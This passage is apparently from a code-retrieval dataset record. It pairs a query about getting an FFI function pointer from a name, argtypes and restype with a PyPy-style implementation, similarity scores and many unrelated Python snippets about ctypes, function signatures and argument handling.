time.sleep(1)\n os.system(\n 'sudo pon {}'.format(os.path.basename(self.ppp_config_file))\n )\n # wait 420 seconds for ppp to start, if not raise TimeoutError\n self.check_internet_connection()\n else:\n self._logger.info('The device is already connected to the internet!')", "def enable(self):\n # Netmiko reports enable and config mode as being enabled\n if not 
self.native.check_enable_mode():\n self.native.enable()\n # Ensure device is not in config mode\n if self.native.check_config_mode():\n self.native.exit_config_mode()\n\n log.debug(\"Host %s: Device enabled.\", self.host)" ]
[ "0.6191428", "0.60795987", "0.60477906", "0.5971737", "0.59445924", "0.58588445", "0.57119495", "0.570681", "0.57007", "0.5689363", "0.5664943", "0.5628451", "0.5603096", "0.5597446", "0.55574036", "0.55567616", "0.5528155", "0.55259633", "0.5525236", "0.5521546", "0.5498724", "0.54806113", "0.54776305", "0.54715896", "0.54531723", "0.5424893", "0.5418745", "0.54014814", "0.5397726", "0.5395694", "0.5393082", "0.5384797", "0.53837985", "0.53837985", "0.53809965", "0.5351186", "0.5349952", "0.53341883", "0.53162664", "0.5301294", "0.5289985", "0.52673656", "0.5261528", "0.52350014", "0.5234527", "0.5229608", "0.5215584", "0.5204775", "0.5199902", "0.5199776", "0.5194728", "0.5194076", "0.51851326", "0.5179236", "0.51687616", "0.5157182", "0.51549226", "0.51439995", "0.51433116", "0.51369345", "0.5124248", "0.51204705", "0.51197916", "0.51171803", "0.51139224", "0.5109543", "0.5093438", "0.50643015", "0.5059835", "0.50556666", "0.5054786", "0.50528735", "0.50486434", "0.5036808", "0.50358045", "0.50302047", "0.50250566", "0.5023944", "0.5023754", "0.50225794", "0.5016115", "0.50054806", "0.49994096", "0.49944633", "0.49833134", "0.49795946", "0.49792755", "0.49623707", "0.49594054", "0.4958652", "0.49570364", "0.495346", "0.49533245", "0.49491265", "0.4943222", "0.49398342", "0.49361455", "0.4930097", "0.4929987", "0.49286333" ]
0.71384984
0
Get a pointer for function name with provided argtypes and restype
def ptr(self, space, w_name, w_argtypes, w_restype, flags=FUNCFLAG_CDECL):
    resshape = unpack_resshape(space, w_restype)
    if resshape is None:
        w_resshape = space.w_None
    else:
        w_resshape = resshape
    argtypes_w = space.fixedview(w_argtypes)
    w_argtypes = space.newtuple(argtypes_w)
    w_key = space.newtuple([w_name, w_argtypes, w_resshape])
    try:
        return space.getitem(self.w_cache, w_key)
    except OperationError as e:
        if e.match(space, space.w_KeyError):
            pass
        else:
            raise
    # Array arguments not supported directly (in C, an array argument
    # will be just a pointer). And the result cannot be an array (at all).
    argshapes = unpack_argshapes(space, w_argtypes)
    ffi_argtypes = [shape.get_basic_ffi_type() for shape in argshapes]
    if resshape is not None:
        ffi_restype = resshape.get_basic_ffi_type()
    else:
        ffi_restype = ffi_type_void
    if space.isinstance_w(w_name, space.w_text):
        name = space.text_w(w_name)
        try:
            ptr = self.cdll.getrawpointer(name, ffi_argtypes, ffi_restype, flags)
        except KeyError:
            raise oefmt(space.w_AttributeError,
                        "No symbol %s found in library %s", name, self.name)
        except LibFFIError:
            raise got_libffi_error(space)
    elif (_MS_WINDOWS and space.isinstance_w(w_name, space.w_int)):
        ordinal = space.int_w(w_name)
        try:
            ptr = self.cdll.getrawpointer_byordinal(ordinal, ffi_argtypes,
                                                    ffi_restype, flags)
        except KeyError:
            raise oefmt(space.w_AttributeError,
                        "No symbol %d found in library %s", ordinal, self.name)
        except LibFFIError:
            raise got_libffi_error(space)
    else:
        raise oefmt(space.w_TypeError,
                    "function name must be string or integer")
    w_funcptr = W_FuncPtr(space, ptr, argshapes, resshape)
    space.setitem(self.w_cache, w_key, w_funcptr)
    return w_funcptr
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_func(name, argtypes=None, restype=c_int, lib=libDE):\n logger.debug(\"Getting NewWordFinder API function: 'name': '{}', 'argtypes': '{}',\"\n \" 'restype': '{}'.\".format(name, argtypes, restype))\n func = getattr(lib, name)\n if argtypes is not None:\n func.argtypes = argtypes\n if restype is not c_int:\n func.restype = restype\n logger.debug(\"NewWordFinder API function '{}' retrieved.\".format(name))\n return func", "def fsig(\n arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n parametric_bindings: Optional[ParametricBindings]\n) -> Tuple[ConcreteType, SymbolicBindings]:\n logging.vlog(5, 'Instantiating for builtin %r @ %s', name, span)\n _Checker(arg_types, name, span).len(2).is_array(0).is_fn(1, argc=1)\n t = arg_types[0].get_element_type() # pytype: disable=attribute-error\n u, symbolic_bindings = parametric_instantiator.instantiate_function(\n span, arg_types[1], (t,), ctx, parametric_bindings, {})\n return_type = ArrayType(u, arg_types[0].size) # pytype: disable=attribute-error\n return FunctionType(arg_types, return_type), symbolic_bindings", "def get_func_type(self, *args):\n return _ida_hexrays.cfuncptr_t_get_func_type(self, *args)", "def fptrunc(self, typ):", "def get_arg_name(args):\n names = []\n for arg in args:\n if type(arg).__name__ == 'ID':\n names.append(arg.name)\n elif type(arg).__name__ == 'UnaryOp':\n names.append(arg.expr.name)\n elif type(arg).__name__ == 'StructRef':\n #############################################\n # So far, we don't care about this situation:\n # fun(a->b)\n # POSSIBLE CODE HERE\n #############################################\n names.append(None)\n return names", "def _find_by_name(details: CallableDetails, name: str):\n arg = details.arg_by_name(name)\n if not arg:\n raise IncompatibleHandlerFactoryError(\n f\"Callable {details.obj!r} has no argument named {name}\"\n )\n return arg", "def cpp_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cts = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n ct = self.cpp_type(x)\n elif argkind is Arg.LIT:\n ct = self.cpp_literal(x)\n elif isinstance(x, Number):\n ct = self.cpp_literal(x)\n else:\n try:\n ct = self.cpp_type(x) # guess it is a type\n except TypeError:\n ct = x # guess it is a variable\n cts.append(ct)\n fname += '' if 0 == len(cts) else \"< \" + \", \".join(cts) + \" >\"\n return fname", "def _init_signature(func_name, restype, argtypes):\n global cfi\n f = getattr(cfi, func_name)\n f.restype = restype\n f.argtypes = argtypes", "def infer_function_call(func, func_type, argtypes):\n from numba2 import phase\n\n if is_method(func_type):\n func = func_type.parameters[0]\n argtypes = [func_type.parameters[1]] + list(argtypes)\n else:\n func = func.const\n\n # TODO: Support recursion !\n\n if len(func.overloads) == 1 and not func.opaque:\n argtypes = fill_missing_argtypes(func.py_func, tuple(argtypes))\n\n env = fresh_env(func, argtypes)\n func, env = phase.typing(func, env)\n # env[\"numba.typing.restype\"]\n if func_type is None:\n func_type = env[\"numba.typing.signature\"]\n return func, func_type, env[\"numba.typing.restype\"]", "def infer_foreign_call(func, func_type, argtypes):\n\n if isinstance(func_type, type(ForeignFunction.type)):\n restype = func_type.parameters[-1]\n else:\n restype = func_type.restype\n assert restype\n\n expected_argtypes = func_type.parameters[:-1]\n\n if len(argtypes) != 
len(expected_argtypes):\n raise TypeError(\"Function %s requires %d argument(s), got %d\" % (\n func, len(argtypes), len(expected_argtypes)))\n\n # Make sure we have compatible types\n unify(zip(argtypes, expected_argtypes))\n\n return func, Function[expected_argtypes + (restype,)], restype", "def wrap_function(funcname, restype, argtypes):\n func = _lib.__getattr__(funcname)\n func.restype = restype\n func.argtypes = argtypes\n return func", "def _name_from_args(func, _, params):\n return \"{}_{}\".format(func.__name__, \"_\".join(str(arg) for arg in params.args))", "def test_vulkan_func_pointer() -> None:\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef void (VKAPI_PTR *\n <name>PFN_vkInternalAllocationNotification</name>)(\n <type>void</type>* pUserData,\n <type>size_t</type> size,\n <type>VkInternalAllocationType</type> allocationType,\n <type>VkSystemAllocationScope</type> allocationScope);</type>\n \"\"\"\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n assert isinstance(funcptr, internal_types.VulkanFunctionPtr)\n\n assert funcptr.typename == \"PFN_vkInternalAllocationNotification\"\n assert funcptr.return_type == \"void\"\n assert len(funcptr.arguments) == 4\n\n argument_names = list(funcptr.arguments.keys())\n\n assert argument_names[0] == \"pUserData\"\n assert funcptr.arguments[\"pUserData\"].argument_type == \"void*\"\n\n assert argument_names[1] == \"size\"\n assert funcptr.arguments[\"size\"].argument_type == \"size_t\"\n\n assert argument_names[2] == \"allocationType\"\n assert funcptr.arguments[\"allocationType\"].argument_type == \"VkInternalAllocationType\"\n\n assert argument_names[3] == \"allocationScope\"\n assert funcptr.arguments[\"allocationScope\"].argument_type == \"VkSystemAllocationScope\"", "def map_string2func(funcname, clss, compute_capability):\n if \"_get_\" + funcname not in globals():\n raise AttributeError(\"kernel type '\" + funcname + \"' not understood\")\n return globals()[\"_get_\" + funcname](clss, compute_capability)", "def get_apifunc(arg):\n if isinstance(arg, APIFunc):\n return arg\n\n if callable(arg):\n return APIFunc(arg)\n\n raise ValueError(\"Argument %s is neither apifunc nor callable\" % arg)", "def get_func_type(self, *args):\n return _ida_hexrays.cfunc_t_get_func_type(self, *args)", "def cython_funcname(self, name, argkinds=None):\n if isinstance(name, basestring):\n return name\n if argkinds is None:\n argkinds = [(Arg.NONE, None)] * (len(name) - 1)\n fname = name[0]\n cfs = []\n for x, (argkind, argvalue) in zip(name[1:], argkinds):\n if argkind is Arg.TYPE:\n cf = self.cython_functionname(x)[1]\n elif argkind is Arg.LIT:\n cf = self.cython_literal(x)\n elif argkind is Arg.VAR:\n cf = x\n elif isinstance(x, Number):\n cf = self.cython_literal(x)\n else:\n try:\n cf = self.cython_functionname(x)[1] # guess type\n except TypeError:\n cf = x # guess variable\n cfs.append(cf)\n fname += '' if 0 == len(cfs) else \"_\" + \"_\".join(cfs)\n return fname", "def lookup_func_from_fp(fp):\n return lookup_func(fp['m_funcId'])", "def get_type(args_str, entry_type):\r\n # The C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def call_func_by_name(*args, func_name: str = None, **kwargs) -> Any:\r\n assert func_name is not None\r\n func_obj = 
get_obj_by_name(func_name)\r\n assert callable(func_obj)\r\n return func_obj(*args, **kwargs)", "def fsig(arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n _: Optional[ParametricBindings]) -> ConcreteType:\n checker = _Checker(arg_types, name, span).len(2).is_bits(0).is_array(1)\n\n arg0 = arg_types[0]\n arg1 = arg_types[1]\n assert isinstance(arg1, ArrayType), arg1\n assert isinstance(arg1.size.value, int), arg1\n return_type = arg1.element_type\n checker.check_is_bits(return_type,\n 'Want arg 1 element type to be bits; got {0}')\n checker.check_is_len(arg1, arg0.size,\n 'bit width {target} must match {t} array size {t.size}')\n return FunctionType(arg_types, return_type)", "def getFunction(self, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def _build_comute_argtype(num_nd, num_nd_write):\n ret = [_xc_func_p, ctypes.c_size_t]\n ret += [_ndptr] * num_nd\n ret += [_ndptr_w] * num_nd_write\n return tuple(ret)", "def _getargs(fn_sig):\n params = fn_sig.parameters\n args = []\n for k, v in params.items():\n if (v.kind & v.POSITIONAL_OR_KEYWORD) == v.POSITIONAL_OR_KEYWORD:\n args.append(k)\n else:\n msg = \"%s argument type unsupported in jitclass\" % v.kind\n raise errors.UnsupportedError(msg)\n return args", "def __call__(fun_name):", "def function_name(parameters):", "def CALL(name, *args):\r\n funcname = 'is_' + name\r\n func = getattr(libueye, funcname)\r\n new_args = []\r\n for a in args: \r\n if isinstance (a, unicode):\r\n print name, 'argument',a, 'is unicode'\r\n new_args.append (str (a))\r\n else:\r\n new_args.append (a)\r\n return func(*new_args)", "def _get_function_ptr(self, name):\r\n func = _make_function_ptr_instance\r\n self._function_ptrs.setdefault(name, func(self, name))\r\n return self._function_ptrs[name]", "def get_builtin_function(function_name: str, args_list: List[str]) -> Callable[[object, dict], object]:\n # Check if it is a built-in function\n possible_function = [obj for name, obj in getmembers(BuiltinFunctions) if\n name == function_name and isfunction(obj)]\n\n if len(possible_function) == 1:\n return possible_function[0](*args_list)\n else:\n return None", "def _getZeroPtrTypeOrNone(stmnt):\n stmnt = _resolveSingleStatement(stmnt)\n if not isinstance(stmnt, CFuncCall): return\n base = stmnt.base\n if isinstance(base, CStatement):\n if not base.isCType(): return\n base = base.asType()\n if not isinstance(base, CPointerType): return\n assert len(stmnt.args) == 1\n arg = stmnt.args[0]\n assert isinstance(arg, CStatement)\n arg = _resolveSingleStatement(arg)\n if not isinstance(arg, CNumber): return\n if arg.content != 0: return\n return base.pointerOf", "def get_func_by_frame(*args):\n return _ida_frame.get_func_by_frame(*args)", "def convert_arg((arg, attrs, mode, typ, name)):\n iorname = name\n return iorname, (arg, attrs, mode, typ, name)", "def get_pytype(self, c_arg, parse_arg):\n if isinstance(c_arg, FunctionAddress):\n return 'O'\n else:\n try:\n return pytype_parse_registry[(parse_arg.dtype, parse_arg.precision)]\n except KeyError as e:\n raise NotImplementedError(\"Type not implemented for argument collection : \"+str(type(parse_arg))) from e", "def get_arg(instruction, itype):\n\n if itype == itypes.family_code:\n return instruction[7:2]\n elif itype == itypes.opcode:\n return instruction[7:]\n elif itype == itypes.funct3:\n return instruction[15:12]\n elif itype == itypes.funct7:\n return instruction[32:25]\n elif itype == itypes.rs1:\n return instruction[20:15]\n elif itype == itypes.rs2:\n return instruction[25:20]\n 
elif itype == itypes.imm12lo:\n return concat(instruction[32], instruction[7], instruction[31:27])\n elif itype == itypes.imm12hi:\n return concat(instruction[27:25], instruction[12:8])\n elif itype == itypes.instruction_id:\n return instruction[15:12]\n elif itype == itypes.rd:\n return instruction[12:7]\n elif itype == itypes.imm12:\n return instruction[32:20]\n elif itype == itypes.imm12_sb:\n return concat(instruction[32:25], instruction[12:7])\n elif itype == itypes.imm20:\n return concat(instruction[31], instruction[20:12], instruction[20], instruction[31:21])\n elif itype == itypes.imm20_pc:\n return instruction[31:12]\n elif itype == itypes.shamtw:\n return instruction[25:20]\n elif itype == itypes.shamt:\n return instruction[25:20]\n else:\n return None", "def test_short_form_multi():\n from typing import Any, AnyStr\n\n def func(arg1, arg2):\n # type: (AnyStr, int) -> Any\n pass\n\n assert get_type_hints(func, globals(), locals()) == {\n 'return': Any,\n 'arg1': AnyStr,\n 'arg2': int\n }", "def test_vulkan_func_pointer_with_pointer_return_value() -> None:\n xml = \"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n <type category=\"funcpointer\">typedef void* (VKAPI_PTR *\n <name>PFN_vkReallocationFunction</name>)(\n <type>void</type>* pUserData,\n <type>void</type>* pOriginal,\n <type>size_t</type> size,\n <type>size_t</type> alignment,\n <type>VkSystemAllocationScope</type> allocationScope);</type>\n \"\"\"\n\n funcptr = funcptr_parser.parse(ET.fromstring(xml))\n\n assert isinstance(funcptr, internal_types.VulkanFunctionPtr)\n assert funcptr.return_type == \"void*\"", "def WrapFunction(lib, funcname, restype, argtypes):\n func = lib.__getattr__(funcname)\n func.restype = restype\n func.argtypes = argtypes\n return func", "def get_function_by_name(name):\n function_name = name + 'ed'\n return globals()[function_name]", "def find(name: str):\n return _functions[name]", "def cython_c2py_conv_function_pointer(t_, ts):\n t = t_[1]\n argnames = []\n argdecls = []\n argbodys = []\n argrtns = []\n for n, argt in t[1][2]:\n argnames.append(n)\n decl, body, rtn = ts.cython_py2c(n, argt, proxy_name=\"c_\" + n)\n argdecls += decl.split('\\n') if isinstance(decl,basestring) else [decl]\n argbodys += body.split('\\n') if isinstance(body,basestring) else [body]\n argrtns += rtn.split('\\n') if isinstance(rtn,basestring) else [rtn]\n rtnname = 'rtn'\n rtnprox = 'c_' + rtnname\n rtncall = 'c_call_' + rtnname\n while rtnname in argnames or rtnprox in argnames:\n rtnname += '_'\n rtnprox += '_'\n argdecls = indent(argdecls)\n argbodys = indent(argbodys)\n rtndecl, rtnbody, rtnrtn, _ = ts.cython_c2py(rtncall, t[2][2],\n cached=False, proxy_name=rtnprox, existing_name=rtncall)\n if rtndecl is None and rtnbody is None:\n rtnprox = rtnname\n rtndecls = [rtndecl]\n returns_void = (t[2][2] == 'void')\n if not returns_void:\n rtndecls.append(\"cdef {0} {1}\".format(ts.cython_ctype(t[2][2]),\n rtncall))\n rtndecl = indent(rtndecls)\n rtnbody = indent(rtnbody)\n s = ('def {{proxy_name}}({arglist}):\\n'\n '{argdecls}\\n'\n '{rtndecl}\\n'\n ' if {{var}} == NULL:\\n'\n ' raise RuntimeError(\"{{var}} is NULL and may not be '\n 'safely called!\")\\n'\n '{argbodys}\\n')\n s += ' {{var}}({carglist})\\n' if returns_void else \\\n ' {rtncall} = {{var}}({carglist})\\n'\n s += '{rtnbody}\\n'\n s = s.format(arglist=\", \".join(argnames), argdecls=argdecls,\n cvartypeptr=ts.cython_ctype(t_).format(type_name='cvartype'),\n argbodys=argbodys, rtndecl=rtndecl, rtnprox=rtnprox,\n rtncall=rtncall, carglist=\", 
\".join(argrtns), rtnbody=rtnbody)\n caches = 'if {cache_name} is None:\\n' + indent(s)\n if not returns_void:\n caches += \"\\n return {rtnrtn}\".format(rtnrtn=rtnrtn)\n caches += '\\n {cache_name} = {proxy_name}\\n'\n return s, s, caches", "def identify(func):\n def identified(arg):\n func(arg)\n return arg\n return identified", "def _get_first(details: CallableDetails) -> CallableArg:\n return details.args[0]", "def parse_function_signature(code):\n m = re.search(\"^\\s*\" + re_func_decl + \"\\s*{\", code, re.M)\n if m is None:\n print(code)\n raise Exception(\"Failed to parse function signature. \"\n \"Full code is printed above.\")\n rtype, name, args = m.groups()[:3]\n if args == 'void' or args.strip() == '':\n args = []\n else:\n args = [tuple(arg.strip().split(' ')) for arg in args.split(',')]\n return name, args, rtype", "def get_func(self, name_str):\n return self.func.get(name_str)", "def _name_to_func(self, cmd_name: str):\n if cmd_name not in SUPPORTED_COMMANDS:\n # redis remaps \\r or \\n in an error to ' ' to make it legal protocol\n clean_name = cmd_name.replace(\"\\r\", \" \").replace(\"\\n\", \" \")\n raise SimpleError(msgs.UNKNOWN_COMMAND_MSG.format(clean_name))\n sig = SUPPORTED_COMMANDS[cmd_name]\n func = getattr(self, sig.func_name, None)\n return func, sig", "def bind_funct(self, symbol, argtypes=[], restypes=None, used_name=None):\n if used_name is None:\n used_name = symbol\n funct = self.__get_symbol(symbol)\n #print(\"binding function {0}: {1}\".format(symbol, funct))\n self.__funct_config(funct, argtypes, restypes)\n self.__funct_add(used_name, funct)", "def map_type(name):\n\n rv = MAPPINGS.get(name, None)\n if rv is not None:\n return rv\n\n name = name.replace(\"&\", \"*\")\n\n if name.startswith(\"const \"):\n rv = map_type(name[6:])\n\n elif name.endswith(\"const\"):\n rv = map_type(name[:-5])\n\n elif name.endswith(\" *\"):\n mapped = map_type(name[:-2])\n rv = f\"POINTER({mapped})\"\n\n elif name.endswith(\" **\"):\n mapped = map_type(name[:-1])\n rv = f\"POINTER({mapped})\"\n\n elif name.endswith(\"]\"):\n m = re.match(r\"(.*) \\[(\\d+)\\]\", name)\n if m is None:\n raise Exception(f\"Couldn't map type {name}\")\n\n mapped = map_type(m.group(1))\n count = m.group(2)\n\n rv = f\"({mapped} * {count})\"\n\n elif \"(*)\" in name:\n return \"c_void_p\"\n\n else:\n raise Exception(f\"Couldn't map type {name!r}\")\n\n MAPPINGS[name] = rv\n return rv", "def get_func(op):\n if op == \"-e\":\n return func\n elif op == \"-d\":\n return unfunc", "def dummy_ptrtype(*args):\n return _ida_hexrays.dummy_ptrtype(*args)", "def type(name):", "def test_from_callable(self):\n def func(a: int = 0):\n return a\n fsig = FSignature.from_callable(func)\n assert len(fsig.parameters) == 1\n assert fsig.parameters['a'] == FParameter(\n kind=inspect.Parameter.POSITIONAL_OR_KEYWORD,\n name='a',\n interface_name='a',\n default=0,\n type=int,\n )", "def _PyType_Lookup(space, type, w_name):\n w_type = from_ref(space, rffi.cast(PyObject, type))\n assert isinstance(w_type, W_TypeObject)\n\n if not space.isinstance_w(w_name, space.w_text):\n return None\n name = space.text_w(w_name)\n w_obj = w_type.lookup(name)\n # this assumes that w_obj is not dynamically created, but will stay alive\n # until w_type is modified or dies. 
Assuming this, we return a borrowed ref\n return w_obj", "def __call__(self, details: CallableDetails) -> CallableArg:\n if not details.args:\n raise IncompatibleHandlerFactoryError(\n f\"Callable {details.obj!r} has no explicit argument\"\n )\n arg = self._find(details)\n self._check_type(details, arg)\n return arg", "def getcallargs(func, *positional, **named):\r\n args, varargs, varkw, defaults = getargspec(func)\r\n f_name = func.__name__\r\n arg2value = {}\r\n\r\n # The following closures are basically because of tuple parameter unpacking.\r\n assigned_tuple_params = []\r\n def assign(arg, value):\r\n if isinstance(arg, str):\r\n arg2value[arg] = value\r\n else:\r\n assigned_tuple_params.append(arg)\r\n value = iter(value)\r\n for i, subarg in enumerate(arg):\r\n try:\r\n subvalue = next(value)\r\n except StopIteration:\r\n raise ValueError('need more than %d %s to unpack' %\r\n (i, 'values' if i > 1 else 'value'))\r\n assign(subarg,subvalue)\r\n try:\r\n next(value)\r\n except StopIteration:\r\n pass\r\n else:\r\n raise ValueError('too many values to unpack')\r\n def is_assigned(arg):\r\n if isinstance(arg,str):\r\n return arg in arg2value\r\n return arg in assigned_tuple_params\r\n if ismethod(func) and func.im_self is not None:\r\n # implicit 'self' (or 'cls' for classmethods) argument\r\n positional = (func.im_self,) + positional\r\n num_pos = len(positional)\r\n num_total = num_pos + len(named)\r\n num_args = len(args)\r\n num_defaults = len(defaults) if defaults else 0\r\n for arg, value in zip(args, positional):\r\n assign(arg, value)\r\n if varargs:\r\n if num_pos > num_args:\r\n assign(varargs, positional[-(num_pos-num_args):])\r\n else:\r\n assign(varargs, ())\r\n elif 0 < num_args < num_pos:\r\n raise TypeError('%s() takes %s %d %s (%d given)' % (\r\n f_name, 'at most' if defaults else 'exactly', num_args,\r\n 'arguments' if num_args > 1 else 'argument', num_total))\r\n elif num_args == 0 and num_total:\r\n raise TypeError('%s() takes no arguments (%d given)' %\r\n (f_name, num_total))\r\n for arg in args:\r\n if isinstance(arg, str) and arg in named:\r\n if is_assigned(arg):\r\n raise TypeError(\"%s() got multiple values for keyword \"\r\n \"argument '%s'\" % (f_name, arg))\r\n else:\r\n assign(arg, named.pop(arg))\r\n if defaults: # fill in any missing values with the defaults\r\n for arg, value in zip(args[-num_defaults:], defaults):\r\n if not is_assigned(arg):\r\n assign(arg, value)\r\n if varkw:\r\n assign(varkw, named)\r\n elif named:\r\n unexpected = next(iter(named))\r\n if isinstance(unexpected, unicode):\r\n unexpected = unexpected.encode(sys.getdefaultencoding(), 'replace')\r\n raise TypeError(\"%s() got an unexpected keyword argument '%s'\" %\r\n (f_name, unexpected))\r\n unassigned = num_args - len([arg for arg in args if is_assigned(arg)])\r\n if unassigned:\r\n num_required = num_args - num_defaults\r\n raise TypeError('%s() takes %s %d %s (%d given)' % (\r\n f_name, 'at least' if defaults else 'exactly', num_required,\r\n 'arguments' if num_required > 1 else 'argument', num_total))\r\n return arg2value", "def find_called_function(self, name, node):\n\n functions = self.context.get_functions(name)\n\n if len(functions) == 1:\n return functions[0]\n else:\n matching_functions = []\n\n for function in functions:\n if self.visit_call_params(function, node):\n matching_functions.append(function)\n\n if len(matching_functions) != 1:\n raise CompileError('ambigious function call', node)\n\n return matching_functions[0]", "def extractFunction(func, name = None):\n 
if name == None and repr(type(func)) == \"<type 'instancemethod'>\":\n new_func = mkfunction(func.func_code, func.func_globals)\n return new_func\n\n if not hasattr(func, 'func_code'):\n raise ValueError, '%s is not a function.' % func\n\n code_object = None\n for const in func.func_code.co_consts.__iter__():\n if hasattr(const, 'co_name') and const.co_name == name:\n code_object = const\n\n if code_object:\n new_func = mkfunction(code_object, func.func_globals)\n return new_func\n else:\n raise ValueError, '%s does not have %s.' % (func, name)", "def get_func_lookup():\n return {\n \"randomstr\": randomstr,\n \"random\": random,\n \"sha256\": sha256,\n \"ed25519\": ed25519_private_key,\n \"rsa\": rsa_private_key,\n \"rsapublic\": rsa_public_key,\n \"publickey\": public_key,\n \"reveal\": reveal,\n \"loweralphanum\": loweralphanum,\n \"basicauth\": basicauth,\n }", "def createFunction(self, entryPoint: ghidra.program.model.address.Address, name: unicode) -> ghidra.program.model.listing.Function:\n ...", "def signature(function):\n pass", "def _function_factory(name: str, _command_type: type) -> Callable:\n\n def _new_func(**kwargs) -> None:\n \"\"\"Actual execution starter.\n\n We need so many wrappers because all those decorators\n could not be applied in a simple cycle. Last applied\n instance will just overwrite all.\n \"\"\"\n command = _command_type(**kwargs)\n run(command)\n\n _new_func.__name__ = name\n return _new_func", "def get_fsignature(builtin_name: Text) -> SignatureFn:\n signature = _PARAMETRIC_NAME_TO_SIGNATURE[builtin_name]\n f = _FSIGNATURE_REGISTRY[signature]\n\n # Since most of the functions don't need to provide symbolic bindings we make\n # a little wrapper that provides trivially empty ones to alleviate the typing\n # burden.\n def wrapper(\n arg_types: ArgTypes, name: Text, span: Span, ctx: DeduceCtx,\n parametric_bindings: Optional[ParametricBindings]\n ) -> Tuple[ConcreteType, SymbolicBindings]:\n result = f(arg_types, name, span, ctx, parametric_bindings)\n if isinstance(result, tuple):\n return result\n assert isinstance(result, ConcreteType), result\n return result, SymbolicBindings()\n\n return wrapper", "def get_function(callable_):\n if isinstance(callable_, types.MethodType):\n return callable_.__func__\n return callable_", "def type_cast(func,data_entry,*args):\n assert isinstance(data_entry,str)\n assert callable(func)\n try:\n out=func(data_entry,*args)\n except:\n out=None\n return out", "def selectorFor(callable, argIndex=-1):\n if argIndex == -1:\n for arg in callable.__metadata__()['arguments']:\n if arg['type'] == _C_SEL and 'sel_of_type' in arg:\n signature = arg['sel_of_type']\n break\n else:\n raise ValueError(\"No selector argument with type information\")\n\n else:\n try:\n signature = callable.__metadata__()['arguments'][argIndex]['sel_of_type']\n except (IndexError, KeyError):\n raise ValueError(\"Not a selector argument with type information\")\n\n def addSignature(function):\n return selector(function, signature=signature)\n\n return addSignature", "def getargspec(func):\n if isinstance(func, partial):\n return inspect.getargspec(func.func)\n else:\n if isinstance(func, type):\n return inspect.getargspec(func.__init__)\n else:\n return inspect.getargspec(func)", "def helper(func, options='args'):\n answer = inspect.getargspec(func)\n if options == 'args':\n print answer[0]\n elif options == 'default':\n print answer[-1]\n else:\n print func.__doc__", "def getargspec(self,obj):\n\n if inspect.isfunction(obj):\n func_obj = obj\n elif 
inspect.ismethod(obj):\n func_obj = obj.im_func\n else:\n raise TypeError, 'arg is not a Python function'\n args, varargs, varkw = inspect.getargs(func_obj.func_code)\n return args, varargs, varkw, func_obj.func_defaults", "def lookup(self, *args, **kwargs): # real signature unknown\n pass", "def lookup(self, *args, **kwargs): # real signature unknown\n pass", "def _getargspec(factory):\n import inspect\n if inspect.isclass(factory):\n factory = factory.__init__\n\n #logging.debug(\"Inspecting %r\", factory)\n args, vargs, vkw, defaults = inspect.getargspec(factory)\n if inspect.ismethod(factory):\n args = args[1:]\n return args, defaults", "def convert_result_as_arg(self, node, ordered_functions):\n return ordered_functions # XXX - do nothing for now\n options = node.options\n fmt_func = node.fmtdict\n# if options.F_string_len_trim is False: # XXX what about vector?\n# return\n\n ast = node.ast\n result_typemap = ast.typemap\n result_name = None\n\n # Check if result needs to be an argument.\n attrs = ast.attrs\n meta = ast.metaattrs\n if meta[\"deref\"] == \"raw\":\n # No bufferify required for raw pointer result.\n pass\n elif result_typemap.sgroup in [\"char\", \"string\"]:\n result_name = fmt_func.F_string_result_as_arg\n# result_as_arg = fmt_func.F_string_result_as_arg\n# result_name = result_as_arg or fmt_func.C_string_result_as_arg\n# elif result_typemap.base == \"vector\":\n# has_vector_result = True\n# elif result_is_ptr:\n# if meta[\"deref\"] in [\"allocatable\", \"pointer\"]:\n# need_cdesc_result = True\n# elif attrs[\"dimension\"]:\n# need_cdesc_result = True\n\n if not result_name:\n return\n\n##########\n # Create a new C function and change arguments\n # and add attributes.\n C_new = node.clone()\n ordered_functions.append(C_new)\n self.append_function_index(C_new)\n\n# generated_suffix = \"buf\"\n C_new._generated = \"result_to_arg\"\n fmt_func = C_new.fmtdict\n# fmt_func.function_suffix = fmt_func.function_suffix + fmt_func.C_bufferify_suffix + \"XXX\"\n# fmt_func.function_suffix = fmt_func.function_suffix\n\n options = C_new.options\n C_new.wrap.assign(c=True, fortran=True)\n C_new._PTR_C_CXX_index = node._function_index\n##########\n\n # decl: const char * getCharPtr2()\n new_arg = C_new.ast.result_as_arg(result_name)\n new_arg.const = False # must be writeable\n# attrs = new_arg.attrs\n# new_arg.metaattrs[\"deref\"] = None\n # Special case for wrapf.py to override \"allocatable\"\n\n # Special case for wrapf.py to override \"allocatable\"\n node.ast.metaattrs[\"deref\"] = None\n new_arg.metaattrs[\"deref\"] = \"result\"\n new_arg.metaattrs[\"is_result\"] = True\n C_new.ast.metaattrs[\"intent\"] = \"subroutine\"\n C_new.ast.metaattrs[\"deref\"] = None\n\n node.wrap.fortran = False\n# node.wrap.c = False\n\n return\n F_new = self.result_as_arg(node, C_new)\n ordered_functions.append(F_new)\n self.append_function_index(F_new)", "def test_short_form_single():\n def func(arg1):\n # type: (int) -> None\n pass\n\n assert get_type_hints(func) == {\n 'return': type(None),\n 'arg1': int\n }", "def _get_local_func_type(expr, context):\n\n # Sanity check.\n import expressions\n if (not isinstance(expr, expressions.Function_Call)):\n return None\n\n # Do we have the function definition?\n func_def = None\n try:\n func_def = context.get(expr.name)\n except KeyError:\n return None\n\n # Return the return type of the called function.\n if (hasattr(func_def, \"return_type\")):\n return func_def.return_type\n return None", "def derive_args(func):\n args = 
